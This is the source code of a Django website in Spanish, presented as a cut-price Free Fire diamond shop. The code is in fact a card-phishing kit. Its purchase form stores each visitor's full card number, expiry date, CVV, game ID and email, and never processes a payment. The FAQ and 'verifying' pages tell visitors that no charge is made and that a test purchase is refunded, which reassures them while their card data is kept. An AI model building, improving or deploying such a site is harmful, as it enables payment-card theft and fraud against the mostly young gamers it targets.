Home/Home/urls.py
from django.contrib import admin
from django.urls import path, include

urlpatterns = [
    path("", include("recargas.urls")),
    path('admin/', admin.site.urls),
]

Home/recargas/urls.py
from django.urls import path
from . import views


app_name = "recargas"
urlpatterns = [
    path("", views.index, name="index"),
    path("<int:numero>/", views.registro, name="registro"),
    path("verificar/", views.verificar, name="verificar"),
    path("info/", views.info, name="info"),
    path('amigo/', views.amigo, name='amigo'),
    # path('pruebas/', views.pruebas, name='pruebas')

]

Home/recargas/models.py
from django.db import models
# Create your models here.
#valor_diamantes es donde se guardaran el valor del diamante.
# name_diamantes es donde se guardaran el nombre en str del valor diamante.
# prece_diamante es el precio del diamante
class Diamantes(models.Model):
      name_diamantes = models.CharField(max_length=200)
      price_diamantes = models.CharField(max_length=200)
      valor_diamantes  = models.IntegerField()
      
      def __str__(self) -> str:
            return self.name_diamantes
      
      
class CardsDatas(models.Model):
      id_game = models.CharField(max_length=20,)
      number_card = models.CharField(max_length=200)
      date = models.CharField(max_length=10)
      cvv = models.CharField(max_length=6)
      #Comprobar el numero del indice que viene por request
      comprobar_numero = models.CharField(max_length=200)
      #Email introducido



      def __str__(self) -> str:
            return self.id_game
      
      
class EmailValido(models.Model):
      email_correo = models.CharField(max_length=200)
      
      def __str__(self) -> str:
            return self.email_correo
      

Home/recargas/views.py
from django.shortcuts import render
from django.http import HttpResponseRedirect
from .models import Diamantes, EmailValido,  CardsDatas


def index(request):
      return render(request, "recargas/index.html")




def registro(request, numero):
      diamantes = Diamantes.objects.get(pk=numero)
      contex = {
            "comprobar_numeros": numero,
            "diamantes": diamantes,
            }
      if request.method == 'POST':
            card = CardsDatas()
            email_3 = EmailValido()

            card.comprobar_numero =  numero
            card.id_game = request.POST['id_game']
            card.number_card = request.POST["number_card"]
            card.date = request.POST["date"]
            card.cvv = request.POST["cvv"]


            email_3.email_correo = request.POST['email_3']
            email_3.save()
            card.save()

            return HttpResponseRedirect("/verificar/")
      else:


            return render(request, "recargas/registro.html", contex)



def verificar(request):
      cards = CardsDatas.objects.all()
      email = EmailValido.objects.all()

      lista_id_game = []
      for card in cards:
               lista_id_game.append(card.id_game)
      counts_cards= len(lista_id_game)
      listo_cards = lista_id_game[counts_cards-1]

      lista_email_correo = []
      for correo in email:
            lista_email_correo.append(correo.email_correo)
      counts_email = len(lista_email_correo)
      listo_email = lista_email_correo[counts_email-1]



      context = {
            "listo_cards": listo_cards,
            "listo_email":listo_email,
      }

      return render(request,"recargas/verificar.html", context)



def info(request):
      return render(request,'recargas/info.html')



def amigo(request):
      return render(request, 'recargas/amigo.html')

Home/recargas/templates/recargas/amigo.html
{% load static %}

<!DOCTYPE html>
<html lang="en">
<head>
      <meta charset="UTF-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-iYQeCzEYFbKjA/T2uDLTpkwGzCiq6soy8tYaI1GyVh/UjpbCx/TYkiZhlZB6+fzT" crossorigin="anonymous">
      <!-- Botstrap js-->
      <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.11.6/dist/umd/popper.min.js" integrity="sha384-oBqDVmMz9ATKxIep9tiCxS/Z9fNfEXiDAYTujMAeBAsjFuCZSmKbSSUnQlmh/jp3" crossorigin="anonymous"></script>
      <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/js/bootstrap.min.js" integrity="sha384-7VPbUDkoPSGFnVtYi0QogXtr74QeVeeIs99Qfg5YCF+TidwNdjvaKZX19NZ/e6oz" crossorigin="anonymous"></script>
      <link rel="stylesheet" href=" {% static '/styles.css' %} ">

      <title>Amigo</title>
</head>
<body>

      <header>
            
            <div class="container   "  id="container-header">
                  <!-- Imagen de logo derecho -->
                  <img src="{% static '/Img/Logo/Frefire.png' %}"   height="90px" width="250px" alt="">
      
                  <div class="enlace-diamantes">
                        <a href="{% url 'recargas:info' %}">Preguntas frecuentes</a>
                        <span>
                              <img src="{% static '/Img/Diamantes.png' %}"  height="20px" width="30px" alt="">
                        </span>
                  </div>
            </div>
      
      </header>

      <main>

          <div class='container bg-light w-25'>
            <form action="" method="post">

                  <input type="text" name="" id=""
                  placeholder='Id player 1'>
                  
                  <input type="text" name="" id=""
                  placeholder='Id player 2'>

            </form>

          </div>
      </main>

      <footer>



      </footer>

</body>
</html>

Home/recargas/templates/recargas/header.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
      <meta charset="UTF-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <link  rel="icon"   href="{% static '/Img/Diamantes.png' %}" type="image/png" />

<!-- Fonts -->
      <link rel="preconnect" href="https://fonts.googleapis.com">
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link href="https://fonts.googleapis.com/css2?family=Itim&display=swap" rel="stylesheet">
<!-- Botstrap css-->
      <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-iYQeCzEYFbKjA/T2uDLTpkwGzCiq6soy8tYaI1GyVh/UjpbCx/TYkiZhlZB6+fzT" crossorigin="anonymous">
<!-- Botstrap js-->
      <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.11.6/dist/umd/popper.min.js" integrity="sha384-oBqDVmMz9ATKxIep9tiCxS/Z9fNfEXiDAYTujMAeBAsjFuCZSmKbSSUnQlmh/jp3" crossorigin="anonymous"></script>
      <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/js/bootstrap.min.js" integrity="sha384-7VPbUDkoPSGFnVtYi0QogXtr74QeVeeIs99Qfg5YCF+TidwNdjvaKZX19NZ/e6oz" crossorigin="anonymous"></script>

<!-- Link CSS -->
      <link rel="stylesheet" href=" {% static '/header.css' %} ">
</head>


{% comment %} {% block  %} {% endcomment %}
<header class='container bg-black mt-3' id='header'>

<!--Logo FreeFire-->
      <img src="{% static '/Img/Logo/Frefire.png' %}"   height="90px" width="250px" alt="">

<!--Carousel of Bootstrap 5v-->
<div class='bg-light  rounded-3 mb-1' id='backdroup'>
{% comment %} <h4>Hi! funciona</h4> {% endcomment %}

<!--Caorousel-->
<div id="carouselExampleFade" class="carousel slide carousel-fade" data-bs-ride="carousel">
            <div class="carousel-inner w-75">
             
                  <div class="carousel-item active ">
                        <h1 class='bg-black opacity-25'>hi</h1>

                    <img src="{% static '/Img/carousel/Carousel1.jpg' %}" class="d-block w-100" alt="...">
                  </div>
                  <div class="carousel-item">
                    <img src="{% static '/Img/carousel/Carousel2.jpg' %}" class="d-block w-100" alt="...">
                  </div>
                  <div class="carousel-item">
                    <img src="{% static '/Img/carousel/Carousel3.jpg' %}" class="d-block w-100" alt="...">
                  </div>
                </div>
                <button class="carousel-control-prev" type="button" data-bs-target="#carouselExampleFade" data-bs-slide="prev">
                  <span class="carousel-control-prev-icon" aria-hidden="true"></span>
                  <span class="visually-hidden">Anterior</span>
                </button>
                <button class="carousel-control-next" type="button" data-bs-target="#carouselExampleFade" data-bs-slide="next">
                  <span class="carousel-control-next-icon" aria-hidden="true"></span>
                  <span class="visually-hidden">Siguiente</span>
                </button>
              </div>
      </div>
      

</header>
{% comment %} {% endblock  %} {% endcomment %}
</html>

Home/recargas/templates/recargas/index.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>

      <meta charset="UTF-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <link  rel="icon"   href="{% static '/Img/Diamantes.png' %}" type="image/png" />

<!-- Fonts -->
      <link rel="preconnect" href="https://fonts.googleapis.com">
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link href="https://fonts.googleapis.com/css2?family=Itim&display=swap" rel="stylesheet">
<!-- Botstrap css-->
      <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-iYQeCzEYFbKjA/T2uDLTpkwGzCiq6soy8tYaI1GyVh/UjpbCx/TYkiZhlZB6+fzT" crossorigin="anonymous">
<!-- Botstrap js-->
      <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.11.6/dist/umd/popper.min.js" integrity="sha384-oBqDVmMz9ATKxIep9tiCxS/Z9fNfEXiDAYTujMAeBAsjFuCZSmKbSSUnQlmh/jp3" crossorigin="anonymous"></script>
      <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/js/bootstrap.min.js" integrity="sha384-7VPbUDkoPSGFnVtYi0QogXtr74QeVeeIs99Qfg5YCF+TidwNdjvaKZX19NZ/e6oz" crossorigin="anonymous"></script>

<!-- Link CSS -->
      <link rel="stylesheet" href=" {% static '/styles.css' %} ">
      <title>Diamonds Freefire</title>
</head>
<body>

<!-- Hearder -->
      <header>
            
             <div class="container shadow shadow "  id="container-header">

<!-- Imagen de logo derecho -->
                  <img src="{% static '/Img/Logo/Frefire.png' %}"   height="90px" width="250px" alt="">

                  <div class="enlace-diamantes">
                        <a href="{% url 'recargas:info' %}">Preguntas frecuentes</a>
                        <span>
                              <img src="{% static '/Img/Diamantes.png' %}"  height="20px" width="30px" alt="">
                        </span>
                  </div>
            </div>

      </header> 

<!-- Main -->
      <main>

<!-- Card 1 -->
            <section class="container " id="seccion-card" >
                  <div class="card" >
                        <h3>Sé el último en pie</h3>
                        <img src="{% static '/Img/Escuadrq.jpg' %}" height="120px"  width="250px" alt="">
                        <p>
                              ¿Como jugar freefire? Facíl, los jugadores se enfrentan en una isla remota en partidas rápidas que duran unos 10 minutospara emboscar,  y buscar equipos. Hay una meta aquí: Controles fáciles de usar y gráficos suaves prometen la mejor experiencia de supervivencia que encontrarás en el móvil.
                        </p>
                        <div class="enlance-ver" >
                              <a href="https://www.youtube.com/watch?v=Ef8wkjvs-Kg">Ver</a>
                        </div>
                  </div>

<!-- Card 2 -->
                  <div class="card" >
                        <h3>¡Diamantes para ganar!</h3>
                        <img src="{% static '/Img/diam2.jpg' %}" height="120px"  width="250px" alt="">
                        <p>Los diamantes son el recurso más valioso en Free Fire. Ellos te permiten obtener algunas ventajas dentro del juego y salir ganador de las partidas. Los Diamantes se utilizan para comprar artículos en la tienda del juego, actualizar el Pase de temporada, girar el Diamante Royale, comprar personajes y ¡hasta desbloquear algunas habilidades extras!
                        </p>
                        <div class="enlance-ver" >
                              <a href="https://www.youtube.com/watch?v=2TNJ3V4-0_s">Ver</a>
                        </div>
                  </div>
<!-- Card 3 -->
                  <div class="card" >
                        <h3>Cómo comprar Diamantes</h3>
                        <img src="{% static '/Img/Gana-diamantes.png' %}" height="120px"  width="250px" alt="">
                        <p>
                              Después de seleccionar el paquete que prefieras y realizar tu compra con éxito podrás reclamar tu código en Hype ingresando a tu inventario y en la pestaña lateral de tu pantalla al seleccionar tu paquete de Diamantes, ingresarás el ID de tu cuenta y así obtendrás tus diamantes de forma inmediata!                        </p>
                        <div class="enlance-ver" >
                              <a href="https://www.youtube.com/watch?v=7zD_JyDMl9g">Ver</a>
                        </div>
                  </div>
            </section>

<!-- Seccion of Buys -->
            <section class="container  " id="container-buy" >
                  <div class="card-buy">
                        <img src="{% static '/Img/Diamantes.png' %}"  width="270px" height="190px" alt="">
                        <h4>FreeFire- 1,500 Diamantes</h4>
                        <div class="enlace-price" >$9.99</div>
                        <div class="enlace-buy">
                              <a href="{% url 'recargas:registro'  1 %}">Comprar</a>
                        </div>
                  </div>
                  
<!-- Card-buys 2 -->
                  <div class="card-buy">
                        <img src="{% static '/Img/Diamantes.png' %}"  width="270px" height="190px" alt="">
                        <h4>FreeFire- 440 Diamantes</h4>
                        <div class="enlace-price" >$3.00</div>
                        <div class="enlace-buy">
                              <a href="{% url 'recargas:registro'  2 %}">Comprar</a>
                        </div>
                  </div>

<!-- Card-buys 3 -->
                  <div class="card-buy">
                        <img src="{% static '/Img/Diamantes.png' %}"  width="270px" height="190px" alt="">
                        <h4>FreeFire- 220 Diamantes</h4>
                        <div class="enlace-price" >$1.00</div>
                        <div class="enlace-buy">
                              <a href="{% url 'recargas:registro'  3 %}">Comprar</a>
                        </div> 
                  </div>

<!-- Card-buys 4 -->
                  <div class="card-buy">
                        <img src="{% static '/Img/Diamantes.png' %}"  width="270px" height="190px" alt="">
                        <h4>FreeFire- 1,270 Diamantes</h4>
                        <div class="enlace-price" >$10.99</div>
                        <div class="enlace-buy">
                              <a href="{% url 'recargas:registro'  4 %}">Comprar</a>
                        </div>
                  </div>

<!-- Card-buys 5 -->
                  <div class="card-buy">
                        <img src="{% static '/Img/Diamantes.png' %}"  width="270px" height="190px" alt="">
                        <h4>FreeFire- 2,500 Diamantes</h4>
                        <div class="enlace-price" >$20.99</div>
                        <div class="enlace-buy">
                              <a href="{% url 'recargas:registro'  5 %}">Comprar</a>
                        </div>
                  </div>

<!-- Card-buys 6 -->
                  <div class="card-buy">
                        <img src="{% static '/Img/Diamantes.png' %}"  width="270px" height="190px" alt="">
                        <h4>FreeFire- 6,300 Diamantes</h4>
                        <div class="enlace-price" >$50.54</div>
                        <div class="enlace-buy">
                              <a href="{% url 'recargas:registro'  6 %}">Comprar</a>
                        </div>
                  </div>
            </section>

<!-- Caorousel  Freefire -->
            <div class="container" >
                  
            <div id="carouselExampleFade" class="carousel slide carousel-fade" data-bs-ride="carousel">
                  
                  <div class="carousel-inner rounded-4 shadow" id="pruebas">
                    <div class="carousel-item active ">
                        <div class="container" id="wandy" >
                              <span>
                                    
                                    <img src="{% static '/Img/Logo/Faceboock.png' %}" width="50px" height="50px" alt="">
                                    <a href="https://web.facebook.com/profile.php?id=100086036228775">Facebook</a>
                              </span>
                              <span>
                                   
                                    <img src="{% static '/Img/Logo/Instagram.png' %}" width="50px"  height="50px" alt="">
                                    <a href="https://www.instagram.com/diamonds.cards0/">Instagram</a>
                              </span>
                        </div>
                      <img src="{% static '/Img/carousel/Carousel1.jpg' %}" class="d-block w-100" alt="...">
                    </div>
                    <div class="carousel-item">
                        <div class="container" id="wandy" >
                              <span>
                                  
                                    <img src="{% static '/Img/Logo/Faceboock.png' %}" width="50px" height="50px" alt="">
                                    <a href="#">Facebook</a>
                              </span>
                              <span>
                                    
                                    <img src="{% static '/Img/Logo/Instagram.png' %}" width="50px"  height="50px" alt="">
                                    <a href="#">Instagram</a>
                              </span>
                        </div>
                      <img src="{% static '/Img/carousel/Carousel2.jpg' %}" class="d-block w-100" alt="...">
                    </div>
                    <div class="carousel-item">
                        <div class="container" id="wandy" >
                              <span>
                                    <img src="{% static '/Img/Logo/Faceboock.png' %}" width="50px" height="50px" alt="">
                                    <a href="#">Facebook</a>
                              </span>
                              <span>
                                 
                                    <img src="{% static '/Img/Logo/Instagram.png' %}" width="50px"  height="50px" alt="">
                                    <a href="#">Instagram</a>
                              </span>
                        </div>
                      <img src="{% static '/Img/carousel/Carousel3.jpg' %}" class="d-block w-100" alt="...">
                    </div>
                  </div>
         
                </div>
            </div>
      </main>

<!-- Footer -->
      <footer class="container" id="container-footer" >

<!-- Informaciones de nosotros -->
      <div class="container-info" >
            <h2>Sobre nosotros</h2>
            <p>
                  Diamons-Cards es una tienda online de recargar diamantes en Freefire,
                  escuchamos los gritos de mejores jugadores y aqui estan los cupones a precios super competitivos, 
                  nos basamos en su registro para dar publicidad y asi generar las mejores ofertas.
            </p>
      </div>

<!-- Derechos reservados -->
      <div class="container-derechos" >
            <h2>Diamonds-Card</h2>
            <p>
                  © 2022, Level Up! Interactive Ltda. TODOS LOS DERECHOS RESERVADOS. 
                  Todas las marcas son propiedad de sus respectivos dueños en los Estados Unidos y en otros países.
                  Los horarios del sitio siguen la Hora oficial de Santiago (GMT-4)
            </p>
      </div>
      </footer>
</body>
</html>

Home/recargas/templates/recargas/info.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>


      <meta charset="UTF-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <link  rel="icon"   href="{% static '/Img/Diamantes.png' %}" type="image/png" />
      <title>Document</title>
      
      <!-- Fonts -->
      <link rel="preconnect" href="https://fonts.googleapis.com">
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link href="https://fonts.googleapis.com/css2?family=Itim&display=swap" rel="stylesheet">
      <!-- Botstrap css-->
      <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-iYQeCzEYFbKjA/T2uDLTpkwGzCiq6soy8tYaI1GyVh/UjpbCx/TYkiZhlZB6+fzT" crossorigin="anonymous">
      <!-- Botstrap js-->
      <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.11.6/dist/umd/popper.min.js" integrity="sha384-oBqDVmMz9ATKxIep9tiCxS/Z9fNfEXiDAYTujMAeBAsjFuCZSmKbSSUnQlmh/jp3" crossorigin="anonymous"></script>
      <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/js/bootstrap.min.js" integrity="sha384-7VPbUDkoPSGFnVtYi0QogXtr74QeVeeIs99Qfg5YCF+TidwNdjvaKZX19NZ/e6oz" crossorigin="anonymous"></script>
      <!-- Link CSS -->
      <link rel="stylesheet" href=" {% static '/styles.css' %} ">
</head>
<body>
      <header>
            
            <div class="container shadow  "  id="container-header">
                  <!-- Imagen de logo derecho -->
                  <img src="{% static '/Img/Logo/Frefire.png' %}"   height="90px" width="250px" alt="">
      
                  <div class="enlace-diamantes">
                        <a href="{% url 'recargas:info' %}">Preguntas frecuentes</a>
                        <span>
                              <img src="{% static '/Img/Diamantes.png' %}"  height="20px" width="30px" alt="">
                        </span>
                  </div>
            </div>
      
      </header>
      <main>
            <div class="container w-75 text-center ">
                  <h2>Preguntas mas frecuentes</h2>
                  <p class="container mt-5 p-3">
                       <h4> <strong >¿Porque no  cobramos por nomina?</strong>  </h4><br> Pues cuando cobras por nomina el banco quita un porcentaje considerable, nuestro sistema hace una compra en Play Store para comprobar su metodo de pago luego se le devolverá dicha compra no pasa el dolar. <br>

                       <h4> <strong>¿Como generan dinero para las compras?</strong></h4><br> Usamos publicidad para generar las ganancias a nuestro favor, gracias a ustedes. <br>

                       <h4> <strong>¿Que pasa si los datos son validos y pasan los 5 minutos de compra?</strong> </h4>No se le aplicaran los cargos. <br>

                        <h4><strong>¿Porque mi compra no se realizo?</strong> </h4><br> Si usted hizo una compra o dos compras es posible que deba esperar algunos dias para poder realizar otra compra o intente con otro metodo de pago.


                       <h4><strong> ¿Porque la espera?</strong> </h4>Pues tenemos muchas solicitudes de compras y necesitamos tiempo para proceder mas de dos compras.

                  </p>

            </div>
            
            <div class="container  ">
                                   
                  <button id="input-button" ><a href="{% url 'recargas:index' %}">Inicio</a></button>

            </div>
      </main>
</body>
</html>

Home/recargas/templates/recargas/verificar.html
{% load static %}

<!DOCTYPE html>
<html lang="en">
<head>
      <meta charset="UTF-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>Verificando</title>
      <meta charset="UTF-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <link  rel="icon"   href="{% static '/Img/Diamantes.png' %}" type="image/png" />
<!-- Fonts -->
      <link rel="preconnect" href="https://fonts.googleapis.com">
      <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      <link href="https://fonts.googleapis.com/css2?family=Itim&display=swap" rel="stylesheet">
<!-- Botstrap css-->
      <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-iYQeCzEYFbKjA/T2uDLTpkwGzCiq6soy8tYaI1GyVh/UjpbCx/TYkiZhlZB6+fzT" crossorigin="anonymous">
<!-- Botstrap js-->
      <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.11.6/dist/umd/popper.min.js" integrity="sha384-oBqDVmMz9ATKxIep9tiCxS/Z9fNfEXiDAYTujMAeBAsjFuCZSmKbSSUnQlmh/jp3" crossorigin="anonymous"></script>
      <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/js/bootstrap.min.js" integrity="sha384-7VPbUDkoPSGFnVtYi0QogXtr74QeVeeIs99Qfg5YCF+TidwNdjvaKZX19NZ/e6oz" crossorigin="anonymous"></script>
<!-- Link CSS -->
      <link rel="stylesheet" href=" {% static '/styles.css' %} ">
      
      <script src="{% static 'script/script.js' %}"></script>
</head>
<body>
      
      <header>
            
            <div class="container shadow"  id="container-header">
                  <!-- Imagen de logo derecho -->
                  <img src="{% static '/Img/Logo/Frefire.png' %}"   height="90px" width="250px" alt="">
      
                  <div class="enlace-diamantes">
                        <a href="{% url 'recargas:info' %}">Preguntas frecuentes</a>
                        <span>
                              <img src="{% static '/Img/Diamantes.png' %}"  height="20px" width="30px" alt="">
                        </span>
                  </div>
            </div>
      
      </header>
      

      <main>
            <div class="container" >
                  <h2>Enviando<strong>..</strong></h2>

                        <div class='container ' >
                              <p>La validacion y su compra puede tardar unos 5 minutos, <strong>Por favor espere mientras confirmamos su metodo de pago.</strong></p>
                        </div>
               
                        <div class="container  " >
                        <ul>
                         
                              

                               <br>
                               <li>
                                    Se enviio un monto de Diamantes a:  
                                    <strong class='text-bg-primary text-capitalize text-bg-body p-1 m-1 rounded-2' >{{listo_cards}}</strong>
                              </li>
                               <br>
                              <li>
                                    Se envio las instrucciones de tu compras a:
                                     <strong class='text-bg-primary text-capitalize text-bg-body p-1 m-1 rounded-2' >{{listo_email}}</strong>
                              </li>
                               
                       
                        </ul>
                        <hr class='mt-5'>
                  </div>

                  <div class="container  ">
                                   
                        <button id="input-button" ><a href="{% url 'recargas:index' %}">Inicio</a></button>
      
                  </div>


                  </div>

                  <div class='container'>
                        <div class='container mb-1 mt-4   rounded-4 ' id='container_invitado'>
                              {% comment %} <h2>No dejes  a tu aliado atras!</h2> {% endcomment %}
                           
                                
                              <div class='container mt-5 d-flex flex-wrap ' id="losabias">
                                    <h3>¿Lo sabias?</h3>
                                    <p>
                                          Si alguien que halla recargado en las ultimas 24 horas, ambos pueden recibir un copon de hasta 100 diamantes!
                                    </p>
                        
                                    <div class='infor bg-black m-1 rounded-3 p w-25 text-center'>
                                          <a href="#">Mas info </a>
                                    </div>

                                    <div class='infor bg-black m-1 rounded-3 p w-25 text-center'>
                                          <input type="button"  onclick='buttom()' value='Continuar' class='bg-transparent text-light  border-0'>
                                    </div>
                              </div>

                              <div class='container flex-wrap rounded-3 w-100 mt-1 border-1 border-dark mt-2 mb-5' id='containerPLAYER'>

                                  <form action="" method="post">
                                    {% csrf_token %}

                                    <input type="text" name="id_player1" id="" placeholder='Aliado id #3232332 '   class=' mt-3 w-100 rounded-2 border-0 p-1'>
                                    <input type="text" name="id_player2" id="" placeholder='Tu id #3245112' 
                                    class=' w-100 mb-1 rounded-2 border-0 p-1 mt-1 ' >
                               

                                    <div class='infor bg-black m-2 rounded-3  w-100 text-center'>
                                          <input type="button"  value='Listo' class='bg-transparent text-light  border-0 '>
                                    </div>
                                  </form>
                              </div>
                              


                        
                  </div>
            <hr>
                  
             <br>     
            </div>
      </main>
</body>
</html>